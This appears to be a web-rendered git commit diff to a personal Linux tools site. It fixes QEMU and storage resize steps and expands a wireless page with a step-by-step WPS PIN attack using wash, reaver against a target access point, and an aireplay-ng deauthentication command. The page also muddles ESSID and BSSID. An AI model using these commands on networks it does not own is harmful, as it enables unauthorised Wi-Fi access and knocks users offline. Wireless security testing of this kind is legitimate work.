about summary refs log tree commit diff stats
path: root/tools
diff options
context:
space:
mode:
Diffstat (limited to 'tools')
-rw-r--r--tools/qemu.html4
-rw-r--r--tools/storage.html2
-rw-r--r--tools/wireless.html38
3 files changed, 34 insertions, 10 deletions
diff --git a/tools/qemu.html b/tools/qemu.html
index d6c1738..262781e 100644
--- a/tools/qemu.html
+++ b/tools/qemu.html
@@ -176,13 +176,13 @@
         the current setting?
         Fix/Ignore? Fix
 
-        (parted) resize 3 100%
+        (parted) resizepart 3 100%
         (parted) quit
         </pre>
 
         <pre>
-        # resize2fs /dev/mapper/nbd0p3
         # e2fsck /dev/mapper/nbd0p3
+        # resize2fs /dev/mapper/nbd0p3
         </pre>
 
         <h2 id="net">3. Network</h2>
diff --git a/tools/storage.html b/tools/storage.html
index 3a0a064..5f7e5e3 100644
--- a/tools/storage.html
+++ b/tools/storage.html
@@ -143,8 +143,8 @@
         images read <a href="qemu.html#resize">resize images</a></p>
 
         <pre>
-        # resize2fs /dev/sda3
         # e2fsck /dev/sda3
+        # resize2fs /dev/sda3
         </pre>
 
         <a href="index.html">Tools Index</a>
diff --git a/tools/wireless.html b/tools/wireless.html
index f4eeddb..afb12b3 100644
--- a/tools/wireless.html
+++ b/tools/wireless.html
@@ -13,11 +13,7 @@
         # iwconfig wlp2s0 essid name_of_network
         </pre>
 
-        <h4>Recover Password WPS</h4>
-
-        <p>Tested on debian system only.</p>
-
-        <p>First get mac address of the target cell;</p>
+        <p>To get mac address of the target cell;</p>
 
         <pre>
         # iwlist wlp2s0 scan
@@ -29,6 +25,11 @@
         Cell 03 - Address: A8:A6:68:98:0C:C5
         </pre>
 
+
+        <h4>Recover Password WPS</h4>
+
+        <p>First check processes that interfere with state of the interface and kill them;</p>
+
         <pre>
         # airmon-ng check
 
@@ -57,7 +58,7 @@
         # kill -9 1271
         </pre>
 
-        <p>Just to be sure that everything is as it should;</p>
+        <p>If wireless card is intel;</p>
 
         <pre>
         # rmmod iwlmvm
@@ -82,6 +83,18 @@
                                         (monitor mode enabled on mon0)
         </pre>
 
+        <p>Airdump-ng don't report if a router have WPS or not, for that is used wash;</p>
+
+        <pre>
+        # wash -i wlp2s0
+        </pre>
+
+        <p>If the program report "Found packet with bad FCS", run with -C;</p>
+
+        <pre>
+        # wash -C -i wlp2s0
+        </pre>
+
         <p>Put mon0 on same channel of target cell;</p>
 
         <pre>
@@ -91,8 +104,19 @@
         <p>Start the magic;</p>
 
         <pre>
-        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -vv
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
         </pre>
 
+        <p>If BSSID is cloaked, not being broadcasted, provide it to reaver;</p>
+
+        <pre>
+        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
+        </pre>
+
+        <p>-a address of access point, -c client to deauthenticate</p>
+
+        <pre>
+        aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
+        </pre>
     </body>
 </html>